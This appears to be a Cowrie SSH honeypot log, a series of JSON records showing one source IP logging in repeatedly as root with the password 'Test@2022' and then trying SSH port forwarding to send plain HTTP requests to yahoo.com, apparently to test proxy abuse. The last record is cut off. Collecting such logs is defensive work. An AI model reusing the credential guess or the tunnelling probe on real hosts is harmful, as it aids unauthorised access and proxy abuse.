{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.873058Z","src_ip":"213.209.150.239","session":"c58570a97fcf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.920111Z","src_ip":"213.209.150.239","session":"c58570a97fcf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.154542Z","src_ip":"213.209.150.239","session":"c58570a97fcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16457,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16457","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.202550Z","session":"c58570a97fcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.249924Z","src_ip":"213.209.150.239","session":"c58570a97fcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23583,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23583","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.385524Z","session":"c58570a97fcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.432731Z","src_ip":"213.209.150.239","session":"c58570a97fcf"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.481247Z","src_ip":"213.209.150.239","session":"c58570a97fcf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23677,"dst_ip":"1.2.3.4","dst_port":22,"session":"3412e92d0669","protocol":"ssh","message":"New connection: 213.209.150.239:23677 (1.2.3.4:22) [session: 3412e92d0669]","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.537404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.538042Z","src_ip":"213.209.150.239","session":"3412e92d0669"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.595215Z","src_ip":"213.209.150.239","session":"3412e92d0669"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.878135Z","src_ip":"213.209.150.239","session":"3412e92d0669"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":22755,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:22755","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.935830Z","session":"3412e92d0669"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:38.992760Z","src_ip":"213.209.150.239","session":"3412e92d0669"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":19608,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19608","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.151061Z","session":"3412e92d0669"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.208315Z","src_ip":"213.209.150.239","session":"3412e92d0669"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.266050Z","src_ip":"213.209.150.239","session":"3412e92d0669"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23730,"dst_ip":"1.2.3.4","dst_port":22,"session":"c17a4734fd80","protocol":"ssh","message":"New connection: 213.209.150.239:23730 (1.2.3.4:22) [session: c17a4734fd80]","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.321635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.322656Z","src_ip":"213.209.150.239","session":"c17a4734fd80"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.379118Z","src_ip":"213.209.150.239","session":"c17a4734fd80"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.660875Z","src_ip":"213.209.150.239","session":"c17a4734fd80"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":21959,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21959","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.718929Z","session":"c17a4734fd80"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.775506Z","src_ip":"213.209.150.239","session":"c17a4734fd80"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":17244,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17244","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.930886Z","session":"c17a4734fd80"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:39.987449Z","src_ip":"213.209.150.239","session":"c17a4734fd80"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.045063Z","src_ip":"213.209.150.239","session":"c17a4734fd80"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23782,"dst_ip":"1.2.3.4","dst_port":22,"session":"196c6cbd4b94","protocol":"ssh","message":"New connection: 213.209.150.239:23782 (1.2.3.4:22) [session: 196c6cbd4b94]","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.101017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.101899Z","src_ip":"213.209.150.239","session":"196c6cbd4b94"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.158640Z","src_ip":"213.209.150.239","session":"196c6cbd4b94"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.441965Z","src_ip":"213.209.150.239","session":"196c6cbd4b94"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":6223,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6223","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.499928Z","session":"196c6cbd4b94"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.556918Z","src_ip":"213.209.150.239","session":"196c6cbd4b94"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":12711,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12711","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.711204Z","session":"196c6cbd4b94"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.767923Z","src_ip":"213.209.150.239","session":"196c6cbd4b94"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.825334Z","src_ip":"213.209.150.239","session":"196c6cbd4b94"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23837,"dst_ip":"1.2.3.4","dst_port":22,"session":"96886b88893a","protocol":"ssh","message":"New connection: 213.209.150.239:23837 (1.2.3.4:22) [session: 96886b88893a]","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.871264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.872503Z","src_ip":"213.209.150.239","session":"96886b88893a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:40.919678Z","src_ip":"213.209.150.239","session":"96886b88893a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.154005Z","src_ip":"213.209.150.239","session":"96886b88893a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":18850,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:18850","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.202013Z","session":"96886b88893a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.249414Z","src_ip":"213.209.150.239","session":"96886b88893a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":10498,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:10498","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.385413Z","session":"96886b88893a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.432533Z","src_ip":"213.209.150.239","session":"96886b88893a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.481114Z","src_ip":"213.209.150.239","session":"96886b88893a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23890,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae5cdf427570","protocol":"ssh","message":"New connection: 213.209.150.239:23890 (1.2.3.4:22) [session: ae5cdf427570]","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.537058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.537794Z","src_ip":"213.209.150.239","session":"ae5cdf427570"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hm